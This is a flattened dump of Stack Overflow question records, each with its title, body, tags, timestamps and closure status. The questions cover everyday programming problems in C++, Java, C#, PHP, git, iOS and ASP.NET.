not a real question
How to make sure not same numbers are entered and order them for less to greater in a array? === I want to know how to store 9 values in an array and then make sure that they are not repeat as well as less to greater
1
523,172
02/07/2009 05:01:45
2,484
08/22/2008 13:36:36
294
2
What is the best/cheapest domain hosting?
I know the answer to these questions may not be the same and a lot of it "depends," but basically I just want to start a site and I'm not planning for it to get a ton of traffic and I don't need a lot of space. I want a hosting service that is reliable and somewhere where I can play around a bit. Any ideas on where is the best place to get it hosted?
website
web-hosting
null
null
null
06/12/2012 09:50:21
not constructive
What is the best/cheapest domain hosting? === I know the answer to these questions may not be the same and a lot of it "depends," but basically I just want to start a site and I'm not planning for it to get a ton of traffic and I don't need a lot of space. I want a hosting service that is reliable and somewhere where I can play around a bit. Any ideas on where is the best place to get it hosted?
4
11,409,787
07/10/2012 08:52:40
1,485,402
06/27/2012 11:04:46
21
1
What is the important memory allocation flaw that is seen here?
Actually this was a homework I got. But I do not know the answer. Can anyone please help me? What is the important memory allocation flaw that is seen in the following C++ code? How can you avoid it? void testFunction(){ int * p = new int(5); cout << p << *p << &p << endl; }
c++
memory-management
null
null
null
07/10/2012 15:53:11
not a real question
What is the important memory allocation flaw that is seen here? === Actually this was a homework I got. But I do not know the answer. Can anyone please help me? What is the important memory allocation flaw that is seen in the following C++ code? How can you avoid it? void testFunction(){ int * p = new int(5); cout << p << *p << &p << endl; }
1
6,035,146
05/17/2011 18:05:51
181,759
09/30/2009 11:17:08
2,010
47
Bug in Integrate vs NIntegrate in mma8
What is going on here: NIntegrate[Log[1/2 + Sqrt[1/4 - 1/(4 x^2)]]/x, {x, 1, Infinity}] --> -0.171007 Integrate[Log[1/2 + Sqrt[1/4 - 1/(4 x^2)]]/x, {x, 1, Infinity}] // N --> 0.171007 The `NIntegrate[]` value is correct. I have run into problems with `PrincipalValue` selections before but a) those have been fixed on mma8 and b) this integral doesn't, or at least shouldn't, have poles in the integration region.
bugs
integrate
null
null
null
null
open
Bug in Integrate vs NIntegrate in mma8 === What is going on here: NIntegrate[Log[1/2 + Sqrt[1/4 - 1/(4 x^2)]]/x, {x, 1, Infinity}] --> -0.171007 Integrate[Log[1/2 + Sqrt[1/4 - 1/(4 x^2)]]/x, {x, 1, Infinity}] // N --> 0.171007 The `NIntegrate[]` value is correct. I have run into problems with `PrincipalValue` selections before but a) those have been fixed on mma8 and b) this integral doesn't, or at least shouldn't, have poles in the integration region.
0
9,267,254
02/13/2012 20:07:00
1,171,550
01/26/2012 15:12:47
6
1
php validate and set $_SESSION data with ajax
before you all assume I haven't read tutorials about this subject I have. I have tried to create my own version but for some reason its not working.. so now I'm beginning to question my basic understanding of ajax and sending post data. On to the main course: Does anyone know how to make a login system where a person clicks on login on the page and it will show a div where there are the login fields. If a person puts in the login information, it'll log the person in without having to refresh the main page however if the login information does not match any in the database it will display the error message in the same div without having to refresh?
php
jquery
mysql
ajax
login
02/13/2012 20:18:33
not constructive
php validate and set $_SESSION data with ajax === before you all assume I haven't read tutorials about this subject I have. I have tried to create my own version but for some reason its not working.. so now I'm beginning to question my basic understanding of ajax and sending post data. On to the main course: Does anyone know how to make a login system where a person clicks on login on the page and it will show a div where there are the login fields. If a person puts in the login information, it'll log the person in without having to refresh the main page however if the login information does not match any in the database it will display the error message in the same div without having to refresh?
4
7,770,834
10/14/2011 16:44:39
995,804
10/14/2011 16:42:33
1
0
I have an idea for a game and need some pointers on getting started
I Have a background with web technologies including PHP, some ajax, mysql, javascript, etc. I'm inspired by this: http://lights.elliegoulding.com/ I want to make a game that is free-roaming like this website but just an actual game of endless colors and fun! I've never done much with programming pc applications let alone games and am wondering where would be the best place to start? I want to have a lot of particle effects and of course like I said I just need some basis for a 3d flyable world. My instincts tell me C# is best, but even at that I have no clue where exactly to start. Could anyone point me in the right direction for my project? I'm talking what softwares/languages to get me making games as quickly as possible. [The Project] Not related to the title but I want to make a game that is a flying free-roam world. This game will have no score and no objectives. The objects on the map will come into view and exist for a short period of time. The actual function of what decorates the randomly generated landscape is also going to be as unpredictable as possible. Perhaps clicking on some things causes them to explode like fireworks while others make the terrain shift. The camera will follow a sort of customizable 'dreamer' or something similar to how it is seen in the link provided above. It will be essentially just a game to play while you're thinking about other stuff.
directx
pc
null
null
null
10/14/2011 22:28:01
not constructive
I have an idea for a game and need some pointers on getting started === I Have a background with web technologies including PHP, some ajax, mysql, javascript, etc. I'm inspired by this: http://lights.elliegoulding.com/ I want to make a game that is free-roaming like this website but just an actual game of endless colors and fun! I've never done much with programming pc applications let alone games and am wondering where would be the best place to start? I want to have a lot of particle effects and of course like I said I just need some basis for a 3d flyable world. My instincts tell me C# is best, but even at that I have no clue where exactly to start. Could anyone point me in the right direction for my project? I'm talking what softwares/languages to get me making games as quickly as possible. [The Project] Not related to the title but I want to make a game that is a flying free-roam world. This game will have no score and no objectives. The objects on the map will come into view and exist for a short period of time. The actual function of what decorates the randomly generated landscape is also going to be as unpredictable as possible. Perhaps clicking on some things causes them to explode like fireworks while others make the terrain shift. The camera will follow a sort of customizable 'dreamer' or something similar to how it is seen in the link provided above. It will be essentially just a game to play while you're thinking about other stuff.
4
8,473,508
12/12/2011 11:20:35
1,065,680
11/25/2011 13:11:06
1
0
How can i add media library in post meta?
How can i add media library in post meta? like this http://www.kingdomcms.com/Capture.PNG
wordpress
custom-fields
media-library
null
null
12/13/2011 16:43:20
off topic
How can i add media library in post meta? === How can i add media library in post meta? like this http://www.kingdomcms.com/Capture.PNG
2
253,820
10/31/2008 14:58:22
17,234
09/18/2008 04:55:37
11
0
Colemak with Emacs or VIM
I've been crossing things out on my TODO list. I've recently picked up Colemak. Next I wanted to learn Vim or Emacs. I was leaning towards Vim, however one of its benefits are sticking to the home row. With Colemak, the home row has been changed. I realize that I could remap the keys, but assigning the functionality to different letters is not extremely appealing to me (if there is any relation between letters and their function. I know movement is not correlated but I'm not sure on all the rest.) I don't want to start an argumentative post about text editors, but rather receive comments from Colemak (or Dvorak) users about alternative keymappings and these two editors. Thanks
colemak
null
null
null
null
10/31/2011 14:33:45
off topic
Colemak with Emacs or VIM === I've been crossing things out on my TODO list. I've recently picked up Colemak. Next I wanted to learn Vim or Emacs. I was leaning towards Vim, however one of its benefits are sticking to the home row. With Colemak, the home row has been changed. I realize that I could remap the keys, but assigning the functionality to different letters is not extremely appealing to me (if there is any relation between letters and their function. I know movement is not correlated but I'm not sure on all the rest.) I don't want to start an argumentative post about text editors, but rather receive comments from Colemak (or Dvorak) users about alternative keymappings and these two editors. Thanks
2
8,606,422
12/22/2011 15:58:30
994,658
10/14/2011 02:52:43
47
2
git push to remote: commits are going through but can't see files?
i have set up a bare repo on a remote server and can push to it but i am not seeing any files on the remote when i'm finished.... this is what I'm seeing when i push: my-macbook-pro:myapp me$ git status # On branch master # Changes not staged for commit: # (use "git add <file>..." to update what will be committed) # (use "git checkout -- <file>..." to discard changes in working directory) # # modified: www/index.php # no changes added to commit (use "git add" and/or "git commit -a") my-macbook-pro:myapp me$ git add . my-macbook-pro:myapp me$ git commit -m 'test' [master 57e4b86] test 1 files changed, 2 insertions(+), 1 deletions(-) my-macbook-pro:myapp me$ git push me@myapp.com's password: Counting objects: 7, done. Delta compression using up to 2 threads. Compressing objects: 100% (3/3), done. Writing objects: 100% (4/4), 368 bytes, done. Total 4 (delta 1), reused 0 (delta 0) To ssh://me@myapp.com:1111/var/www/myapp.git ce07e61..57e4b86 master -> master my-macbook-pro:myapp me$ when i ssh in, the files i've "pushed" are not there. any ideas?
git
ubuntu
null
null
null
null
open
git push to remote: commits are going through but can't see files? === i have set up a bare repo on a remote server and can push to it but i am not seeing any files on the remote when i'm finished.... this is what I'm seeing when i push: my-macbook-pro:myapp me$ git status # On branch master # Changes not staged for commit: # (use "git add <file>..." to update what will be committed) # (use "git checkout -- <file>..." to discard changes in working directory) # # modified: www/index.php # no changes added to commit (use "git add" and/or "git commit -a") my-macbook-pro:myapp me$ git add . my-macbook-pro:myapp me$ git commit -m 'test' [master 57e4b86] test 1 files changed, 2 insertions(+), 1 deletions(-) my-macbook-pro:myapp me$ git push me@myapp.com's password: Counting objects: 7, done. Delta compression using up to 2 threads. Compressing objects: 100% (3/3), done. Writing objects: 100% (4/4), 368 bytes, done. Total 4 (delta 1), reused 0 (delta 0) To ssh://me@myapp.com:1111/var/www/myapp.git ce07e61..57e4b86 master -> master my-macbook-pro:myapp me$ when i ssh in, the files i've "pushed" are not there. any ideas?
0
5,758,760
04/22/2011 18:37:42
508,127
11/15/2010 10:28:18
877
3
How to generate the JSON format data progarmatically using javascript or jquery whatever is good
suppose there is gridivew and every row has three textbox for employee name, employee age and employee department name. there are 10 rows or could be more. so user can enter 10 employee data. i will use PageMethod which will accept that will accept the employee info which i will send from client side. so when user will enter many employee record and click submit button then how can i generate json format data and send to server side function. can any one like to show it with the help of code snippet. basically i need to send complex data from client side to server side method. thanks
javascript
jquery
asp.net
json
null
null
open
How to generate the JSON format data progarmatically using javascript or jquery whatever is good === suppose there is gridivew and every row has three textbox for employee name, employee age and employee department name. there are 10 rows or could be more. so user can enter 10 employee data. i will use PageMethod which will accept that will accept the employee info which i will send from client side. so when user will enter many employee record and click submit button then how can i generate json format data and send to server side function. can any one like to show it with the help of code snippet. basically i need to send complex data from client side to server side method. thanks
0
11,413,987
07/10/2012 13:07:44
1,393,175
05/14/2012 07:23:16
23
1
resizing UIAlertView Issue(white lines around)
I am displaying a table view inside a uialertview and I am getting a strange white line around. I have tried to change the content mode and then call [alertView setNeedsDisplay], but it seems not working. ![enter image description here][1] Could someone help? Thanks. // increase the alertview size, if we are going to show the scope #define ALERT_VIEW_WIDTH 750 #define ALERT_PADDING 20 - (void)willPresentAlertView:(UIAlertView *)alertView { { id thing; if ( [[[alertView class] description] isEqualToString:@"UIAlertTableView"]){ //change the alert view size int center=alertView.center.x-ALERT_VIEW_WIDTH/2; for (thing in alertView.subviews) { NSLog(@"%@", [[thing class] description]); if([[[thing class] description] isEqualToString:@"UITableView"]) { UIView* v=(UIView*)thing; v.frame=CGRectMake(v.frame.origin.x+ALERT_PADDING, v.frame.origin.y, ALERT_VIEW_WIDTH-ALERT_PADDING*3, 250); } if([[[thing class] description] isEqualToString:@"UIAlertButton"]) { UIView* v=(UIView*)thing; v.frame=CGRectMake(v.frame.origin.x+ALERT_PADDING, v.frame.origin.y, ALERT_VIEW_WIDTH-ALERT_PADDING*3, v.frame.size.height-10); } if([[[thing class] description] isEqualToString:@"UILabel"]) { UIView* v=(UIView*)thing; v.frame=CGRectMake(v.frame.origin.x+ALERT_PADDING, v.frame.origin.y, ALERT_VIEW_WIDTH-ALERT_PADDING*3, v.frame.size.height); } } alertView.contentMode = UIViewContentModeRedraw; alertView.frame=CGRectMake(center, alertView.frame.origin.y, ALERT_VIEW_WIDTH, 360); [alertView setNeedsDisplay]; } } } [1]: http://i.stack.imgur.com/P9gDu.png
ios
uitableview
uialertview
null
null
null
open
resizing UIAlertView Issue(white lines around) === I am displaying a table view inside a uialertview and I am getting a strange white line around. I have tried to change the content mode and then call [alertView setNeedsDisplay], but it seems not working. ![enter image description here][1] Could someone help? Thanks. // increase the alertview size, if we are going to show the scope #define ALERT_VIEW_WIDTH 750 #define ALERT_PADDING 20 - (void)willPresentAlertView:(UIAlertView *)alertView { { id thing; if ( [[[alertView class] description] isEqualToString:@"UIAlertTableView"]){ //change the alert view size int center=alertView.center.x-ALERT_VIEW_WIDTH/2; for (thing in alertView.subviews) { NSLog(@"%@", [[thing class] description]); if([[[thing class] description] isEqualToString:@"UITableView"]) { UIView* v=(UIView*)thing; v.frame=CGRectMake(v.frame.origin.x+ALERT_PADDING, v.frame.origin.y, ALERT_VIEW_WIDTH-ALERT_PADDING*3, 250); } if([[[thing class] description] isEqualToString:@"UIAlertButton"]) { UIView* v=(UIView*)thing; v.frame=CGRectMake(v.frame.origin.x+ALERT_PADDING, v.frame.origin.y, ALERT_VIEW_WIDTH-ALERT_PADDING*3, v.frame.size.height-10); } if([[[thing class] description] isEqualToString:@"UILabel"]) { UIView* v=(UIView*)thing; v.frame=CGRectMake(v.frame.origin.x+ALERT_PADDING, v.frame.origin.y, ALERT_VIEW_WIDTH-ALERT_PADDING*3, v.frame.size.height); } } alertView.contentMode = UIViewContentModeRedraw; alertView.frame=CGRectMake(center, alertView.frame.origin.y, ALERT_VIEW_WIDTH, 360); [alertView setNeedsDisplay]; } } } [1]: http://i.stack.imgur.com/P9gDu.png
0
2,325,994
02/24/2010 12:40:47
280,319
02/24/2010 12:40:47
1
0
What % of programming time do you spend debugging?
What % of programming time do you spend debugging? What do you think are acceptable percentages for certain programming mediums?
debugging
null
null
null
null
02/24/2010 14:17:18
not constructive
What % of programming time do you spend debugging? === What % of programming time do you spend debugging? What do you think are acceptable percentages for certain programming mediums?
4
5,173,304
03/02/2011 20:53:44
451,135
09/17/2010 23:53:30
6
0
Fastest way to learn Maven
What is the fastest way to learn maven? I am up to speed with it but can't keep up with its idiosyncrasies. Any idea?
java
maven
null
null
null
03/03/2011 15:59:01
not a real question
Fastest way to learn Maven === What is the fastest way to learn maven? I am up to speed with it but can't keep up with its idiosyncrasies. Any idea?
1
5,967,655
05/11/2011 16:36:30
749,052
05/11/2011 16:01:32
1
0
Can anybody help me to develop a portlet in Liferay 6!
Suppose, i have a table name Student. I want to develop a portlet Student to edit, add and delete on this table on liferay 6. Can't anybody help me to develop this portlet or give me code of the same portlet using methods to add, edit, delete data on this table. Thanks a lot!
liferay-6
null
null
null
null
05/13/2011 01:06:56
not a real question
Can anybody help me to develop a portlet in Liferay 6! === Suppose, i have a table name Student. I want to develop a portlet Student to edit, add and delete on this table on liferay 6. Can't anybody help me to develop this portlet or give me code of the same portlet using methods to add, edit, delete data on this table. Thanks a lot!
1
9,289,259
02/15/2012 07:08:29
590,198
01/26/2011 06:34:34
111
2
SMTP message transport failed to connect to server
I have written an application in C# that sends email. When i am home(no proxy) the emails are sent successfully, but when i am at work, where there is a proxy the error pops up "Transport Failed to connect to server" Here is my code MailMessage oMsg = new MailMessage(); oMsg.From = from.Text; oMsg.To = to.Text; oMsg.Subject = "Hi"; oMsg.BodyFormat = MailFormat.Html; oMsg.Body = msg.Text; oMsg.Fields.Add("http://schemas.microsoft.com/cdo/configuration/smtpserverport", port); oMsg.Fields.Add("http://schemas.microsoft.com/cdo/configuration/smtpserver", host); oMsg.Fields.Add("http://schemas.microsoft.com/cdo/configuration/sendusing", 2); WebProxy proxy = WebProxy.GetDefaultProxy(); if (proxy.Address != null) { oMsg.Fields.Add("http://schemas.microsoft.com/cdo/configuration/urlproxyserver", proxy.Address.Host); oMsg.Fields.Add("http://schemas.microsoft.com/cdo/configuration/proxyserverport", proxy.Address.Port); } oMsg.Fields.Add("http://schemas.microsoft.com/cdo/configuration/smtpusessl", true); oMsg.Fields.Add("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate", "1"); oMsg.Fields.Add("http://schemas.microsoft.com/cdo/configuration/sendusername",from.Text); oMsg.Fields.Add("http://schemas.microsoft.com/cdo/configuration/sendpassword", pass.Text); // ADD AN ATTACHMENT. /* MailAttachment oAttch = new MailAttachment(path+ "\\Image.bmp", MailEncoding.Base64); oMsg.Attachments.Add(oAttch); SmtpMail.SmtpServer.Insert(0,host); if (proxy.Address != null) MessageBox.Show("Sending via proxy settings: " + proxy.Address.ToString()); try { SmtpMail.Send(oMsg); } catch (Exception ex) { MessageBox.Show(ex.Message); } oMsg = null; } Is it possible that proxy server may have some restrictions? I am able to open gmail from my browser but gtalk doesnt work at office. Ant help/suggestion will be appreciated Regards
c#
winforms
email
null
null
null
open
SMTP message transport failed to connect to server === I have written an application in C# that sends email. When i am home(no proxy) the emails are sent successfully, but when i am at work, where there is a proxy the error pops up "Transport Failed to connect to server" Here is my code MailMessage oMsg = new MailMessage(); oMsg.From = from.Text; oMsg.To = to.Text; oMsg.Subject = "Hi"; oMsg.BodyFormat = MailFormat.Html; oMsg.Body = msg.Text; oMsg.Fields.Add("http://schemas.microsoft.com/cdo/configuration/smtpserverport", port); oMsg.Fields.Add("http://schemas.microsoft.com/cdo/configuration/smtpserver", host); oMsg.Fields.Add("http://schemas.microsoft.com/cdo/configuration/sendusing", 2); WebProxy proxy = WebProxy.GetDefaultProxy(); if (proxy.Address != null) { oMsg.Fields.Add("http://schemas.microsoft.com/cdo/configuration/urlproxyserver", proxy.Address.Host); oMsg.Fields.Add("http://schemas.microsoft.com/cdo/configuration/proxyserverport", proxy.Address.Port); } oMsg.Fields.Add("http://schemas.microsoft.com/cdo/configuration/smtpusessl", true); oMsg.Fields.Add("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate", "1"); oMsg.Fields.Add("http://schemas.microsoft.com/cdo/configuration/sendusername",from.Text); oMsg.Fields.Add("http://schemas.microsoft.com/cdo/configuration/sendpassword", pass.Text); // ADD AN ATTACHMENT. /* MailAttachment oAttch = new MailAttachment(path+ "\\Image.bmp", MailEncoding.Base64); oMsg.Attachments.Add(oAttch); SmtpMail.SmtpServer.Insert(0,host); if (proxy.Address != null) MessageBox.Show("Sending via proxy settings: " + proxy.Address.ToString()); try { SmtpMail.Send(oMsg); } catch (Exception ex) { MessageBox.Show(ex.Message); } oMsg = null; } Is it possible that proxy server may have some restrictions? I am able to open gmail from my browser but gtalk doesnt work at office. Ant help/suggestion will be appreciated Regards
0
7,891,652
10/25/2011 15:24:57
937,963
09/10/2011 07:44:29
6
0
Ask for backward chaining
i am a student. i need to do a project to implement a backward chaining. Do anyone have an idea to develop it and an example applying backward chaining. Thank you.
artificial-intelligence
chaining
backwards
null
null
10/25/2011 17:03:22
off topic
Ask for backward chaining === i am a student. i need to do a project to implement a backward chaining. Do anyone have an idea to develop it and an example applying backward chaining. Thank you.
2
7,760,508
10/13/2011 21:14:07
205,463
11/07/2009 06:43:09
354
3
unable to change array size at runtime in java
I'm kinda new in java and I'm trying to port my experience from c# world to java here is the code : public class TestBasket { private Item[] shops = {} ; int arraysIndex=0; public static void main(String argc[]){ TestBasket tb = new TestBasket(); try{ tb.storeItems(new Item("test", 100)); } catch(Exception e){ System.out.println("Error"); System.out.println(e.toString()); } } public void storeItems(Item it){ if (arraysIndex >= shops.length){ ///resizeArray(shops); System.out.println("the count of length is" + shops.length); cpArr(shops); System.out.println("the count of length is" + shops.length); } shops[arraysIndex] = it; arraysIndex++; } //this is a generic method to resize every kind of array public Item[] cpArr(Item[] arr){ Item[] retArr = Arrays.copyOf(arr, arr.length + 10); return retArr; } } after executing the program I will get this message : > length is0 > > length is0 > > Error > > java.lang.ArrayIndexOutOfBoundsException: 0 which means still the length of array is zero which it shouldn't be zero. I'm confused where did I go wrong? regards.
java
arrays
null
null
null
10/13/2011 23:06:13
too localized
unable to change array size at runtime in java === I'm kinda new in java and I'm trying to port my experience from c# world to java here is the code : public class TestBasket { private Item[] shops = {} ; int arraysIndex=0; public static void main(String argc[]){ TestBasket tb = new TestBasket(); try{ tb.storeItems(new Item("test", 100)); } catch(Exception e){ System.out.println("Error"); System.out.println(e.toString()); } } public void storeItems(Item it){ if (arraysIndex >= shops.length){ ///resizeArray(shops); System.out.println("the count of length is" + shops.length); cpArr(shops); System.out.println("the count of length is" + shops.length); } shops[arraysIndex] = it; arraysIndex++; } //this is a generic method to resize every kind of array public Item[] cpArr(Item[] arr){ Item[] retArr = Arrays.copyOf(arr, arr.length + 10); return retArr; } } after executing the program I will get this message : > length is0 > > length is0 > > Error > > java.lang.ArrayIndexOutOfBoundsException: 0 which means still the length of array is zero which it shouldn't be zero. I'm confused where did I go wrong? regards.
3
3,290,663
07/20/2010 13:55:06
48,684
12/23/2008 16:28:24
28,237
950
Microsoft Project and Waterfall
Does using Microsoft Project force you into a waterfall model? Could anyone point me to examples of successful iterative (agile for example) projects that successfully use(d) MS Project as a supporting tool?
ms-project
waterfall
null
null
null
10/25/2011 12:53:50
off topic
Microsoft Project and Waterfall === Does using Microsoft Project force you into a waterfall model? Could anyone point me to examples of successful iterative (agile for example) projects that successfully use(d) MS Project as a supporting tool?
2
10,115,871
04/12/2012 00:30:51
1,039,551
11/10/2011 10:33:50
27
0
html title encoding
<title>...."something"....</title> or <title>....&amp;something&amp;....</title> Which of both is correct? Validator does not care about this.
html
null
null
null
null
04/26/2012 12:30:40
not a real question
html title encoding === <title>...."something"....</title> or <title>....&amp;something&amp;....</title> Which of both is correct? Validator does not care about this.
1
11,591,203
07/21/2012 09:59:50
1,542,479
07/21/2012 09:44:43
1
0
Break image in small Pieces like happen in roll ajoint game in android
Any one has the idea about How to break an image in small pieces like happen in roll a joint game by click on an image in android?
android
android-layout
android-widget
android-animation
android-canvas
07/26/2012 02:34:39
not a real question
Break image in small Pieces like happen in roll ajoint game in android === Any one has the idea about How to break an image in small pieces like happen in roll a joint game by click on an image in android?
1
7,405,905
09/13/2011 17:22:30
674,167
03/24/2011 02:04:56
274
15
Issue with rand()
I'm working on a school project, and I have to build a black jack game, where I chose a "random" card. Each card is assigned to a number between 2-14, but I can't get my number generator to give me a value between that, consistently. There are server other problems with my code, but I'll be able to figure them out once I get rand() working as should be. Can anyone spot anything wrong with this code? I'll post results at the end. int hit(int total) { static int init = 0; int high = 14; int low = 2; int value; if(init == 0) { srand((unsigned int)time(NULL)); init = 1; } value = rand() % (high - low + 1) + low; if(value == 11 || value == 12 || value == 13) { value = 10; } if(value == 14) { if((total + 11) > 21) { value = 1; } else { value = 11; } } return value; } And the printouts (this is used 4 times, only 3 are shown in the out put, plus addition of two of them (which I can never figure out): > The dealer: > > ? + -1041026080 > > You: > > -1073744460 + 9 = 4243742 BUSTED! A few bits of background information: - The algorithm is provided by my teacher. - The static int variable is added via a google search suggestion Any help would be appreciated.
c
null
null
null
null
02/13/2012 02:20:21
too localized
Issue with rand() === I'm working on a school project, and I have to build a black jack game, where I chose a "random" card. Each card is assigned to a number between 2-14, but I can't get my number generator to give me a value between that, consistently. There are server other problems with my code, but I'll be able to figure them out once I get rand() working as should be. Can anyone spot anything wrong with this code? I'll post results at the end. int hit(int total) { static int init = 0; int high = 14; int low = 2; int value; if(init == 0) { srand((unsigned int)time(NULL)); init = 1; } value = rand() % (high - low + 1) + low; if(value == 11 || value == 12 || value == 13) { value = 10; } if(value == 14) { if((total + 11) > 21) { value = 1; } else { value = 11; } } return value; } And the printouts (this is used 4 times, only 3 are shown in the out put, plus addition of two of them (which I can never figure out): > The dealer: > > ? + -1041026080 > > You: > > -1073744460 + 9 = 4243742 BUSTED! A few bits of background information: - The algorithm is provided by my teacher. - The static int variable is added via a google search suggestion Any help would be appreciated.
3
11,563,371
07/19/2012 14:46:51
1,329,187
04/12/2012 13:13:14
3
0
How to make a list object? instance has no attribute '__getitem__'
I am new in Python and in OOP in general. I have an error "...instance has no attribute '__getitem__'", and I understand that the object I have created is not a list. How can I make to be a list object. Here is the class file: #!/usr/bin/python -tt import math, sys, matrix, os class Point: 'Class for points' pointCount = 0 def __init__(self, x, y, z): 'initialise the Point from three coordinates' self.x = x self.y = y self.z = z Point.pointCount += 1 def __str__(self): 'print the Point' return 'Point (%f, %f, %f)' %(self.x, self.y, self.z) def copyPoint(self, distance): 'create another Point at distance from the self Point' return Point(self.x + distance[0], self.y + distance[1], self.z + distance[2]) def __del__(self): 'delete the Point' Point.pointCount -= 1 #print Point.pointCount return '%s deleted' %self I need to have it as a point with three coordinates inside (x, y, z), and those coordinates must be "callable" like in a list instance with []. I have read similar topics but did not understand much. Please describe it in simple words and with examples. Thank you.
python
list
object
getitem
null
null
open
How to make a list object? instance has no attribute '__getitem__' === I am new in Python and in OOP in general. I have an error "...instance has no attribute '__getitem__'", and I understand that the object I have created is not a list. How can I make to be a list object. Here is the class file: #!/usr/bin/python -tt import math, sys, matrix, os class Point: 'Class for points' pointCount = 0 def __init__(self, x, y, z): 'initialise the Point from three coordinates' self.x = x self.y = y self.z = z Point.pointCount += 1 def __str__(self): 'print the Point' return 'Point (%f, %f, %f)' %(self.x, self.y, self.z) def copyPoint(self, distance): 'create another Point at distance from the self Point' return Point(self.x + distance[0], self.y + distance[1], self.z + distance[2]) def __del__(self): 'delete the Point' Point.pointCount -= 1 #print Point.pointCount return '%s deleted' %self I need to have it as a point with three coordinates inside (x, y, z), and those coordinates must be "callable" like in a list instance with []. I have read similar topics but did not understand much. Please describe it in simple words and with examples. Thank you.
0
8,050,287
11/08/2011 12:22:55
173,438
09/14/2009 23:25:21
13
1
Seeking advice on server side computing application
I am starting a rather broad topic here, hoping that an open minded discussion will help others as well (in terms of mutual-participation, overlapping problem areas, mentoring etc). I am exploring available options in terms of software libraries to develop a C++ based server side (probably MS Windows because that's what I know. No Linux tool-chain knowledge here.) computing application (with dll support) that will accept images, perform complex mathematical operations on them using one or the other dll and will give out resulting images (or data files) that will go back to the requesting user. A thin client will need to be generated as well (this could be platform independent). I am looking on advice on following: 1. A robust threading library (BOOST is one I know, but am quite open to for further recommendations) and threading models supporting server side computing. 2. Ideas on a robust architecture that would support this kind of a computing scenario. 3. A customary 'cloud computing' blah.. though in my opinion, it is another name of a typical 3 tier architecture with space-holders to generate revenue through adverts and charging users exorbitantly on a per action basis, I would still like to remain open on suggestions regarding putting this kind of an application on a (more blah follows..) 'public' or a 'private' cloud. An open minded conversation that would not end up in a Operating System War is most appreciated!
c++
server-side
distributed-computing
cluster-computing
grid-computing
11/08/2011 20:28:53
off topic
Seeking advice on server side computing application === I am starting a rather broad topic here, hoping that an open minded discussion will help others as well (in terms of mutual-participation, overlapping problem areas, mentoring etc). I am exploring available options in terms of software libraries to develop a C++ based server side (probably MS Windows because that's what I know. No Linux tool-chain knowledge here.) computing application (with dll support) that will accept images, perform complex mathematical operations on them using one or the other dll and will give out resulting images (or data files) that will go back to the requesting user. A thin client will need to be generated as well (this could be platform independent). I am looking on advice on following: 1. A robust threading library (BOOST is one I know, but am quite open to for further recommendations) and threading models supporting server side computing. 2. Ideas on a robust architecture that would support this kind of a computing scenario. 3. A customary 'cloud computing' blah.. though in my opinion, it is another name of a typical 3 tier architecture with space-holders to generate revenue through adverts and charging users exorbitantly on a per action basis, I would still like to remain open on suggestions regarding putting this kind of an application on a (more blah follows..) 'public' or a 'private' cloud. An open minded conversation that would not end up in a Operating System War is most appreciated!
2
4,134,870
11/09/2010 14:38:33
502,007
11/09/2010 14:38:33
1
0
Spinlock in device driver
Can anybody explain exact use of spinlock in case of device driver. I am just confused as in many of the interrupt handler routines i have seen spinlocks. As spinlock are busy waiting. it can make delay in other interrupts.. Please if possible list down some scenarios for device driver in which we can use spinlock I am new to this field. your help makes some initial boost for me. Thanks Manish
spinlock
null
null
null
null
null
open
Spinlock in device driver === Can anybody explain exact use of spinlock in case of device driver. I am just confused as in many of the interrupt handler routines i have seen spinlocks. As spinlock are busy waiting. it can make delay in other interrupts.. Please if possible list down some scenarios for device driver in which we can use spinlock I am new to this field. your help makes some initial boost for me. Thanks Manish
0
8,204,606
11/20/2011 20:48:56
733,329
05/01/2011 13:53:19
129
8
How we can search on our own SQLite ?
I've a Sqlite with many tables and I want to make a `TextBox` which is able to search on SQL , How can I do this?
android
sqlite
null
null
null
11/21/2011 05:17:27
not a real question
How we can search on our own SQLite ? === I've a Sqlite with many tables and I want to make a `TextBox` which is able to search on SQL , How can I do this?
1
3,486,469
08/15/2010 06:34:12
148,390
07/31/2009 09:30:18
151
6
Launching System Processes From Rails
I want users to upload pics and then have a background process that converts them to an animated gif. For right now I'd just like to fork a sys process and let a script do the processing.
ruby-on-rails
null
null
null
null
null
open
Launching System Processes From Rails === I want users to upload pics and then have a background process that converts them to an animated gif. For right now I'd just like to fork a sys process and let a script do the processing.
0
9,854,701
03/24/2012 19:14:31
1,288,298
03/23/2012 12:58:50
1
0
c# How can i pass my values in e-mail activation link?
I wrote some codes in deneme.aspx it works but it does not pass the variables(Id(levent) and userName(levent)) to activateUser.aspx. how can i do it? SmtpClient SmtpServer = new SmtpClient("smtp.live.com"); var mail = new MailMessage(); mail.From = new MailAddress("bilkentliaslan@windowslive.com"); mail.To.Add("levent_kalay@hotmail.com"); mail.Subject = "Test Mail - 1"; mail.IsBodyHtml = true; string htmlBody; htmlBody = string.Format("<a href='http://localhost:15534/ActivateUser.aspx? userName{0}&Id={1}'>Activate {0} </a>", "levent", "levent"); mail.Body = htmlBody; SmtpServer.Port = 587; SmtpServer.UseDefaultCredentials = false; SmtpServer.Credentials = new System.Net.NetworkCredential("bilkentliaslan@windowslive.com", "mypassword"); SmtpServer.EnableSsl = true; SmtpServer.Send(mail); Then, After clicking the confirmation link, It goes to ActivateUser.aspx in there protected void Page_Load(object sender, EventArgs e) { if (String.IsNullOrEmpty(Request.Params["Id"])) { // We do not have the userId. Redirect some where Response.Redirect("login.aspx"); } else { // We have a userId. try { DBConnection db = new DBConnection(); string username= Request.Params["userName"]; bool res = db.CheckLogin(Request.Params["userName"],Request.Params["Id"]); if (res) { Session["LetLogin"] = "ok"; Session["User_Name"] = Request.Params["userName"]; Response.Redirect("WebForm4.aspx",true); } } catch { // Error. Redirect some where Response.Redirect("login.aspx"); } } // We should never reach here. Just in case redirect some where Response.Redirect("login.aspx", true); }
c#
asp.net
email
null
null
null
open
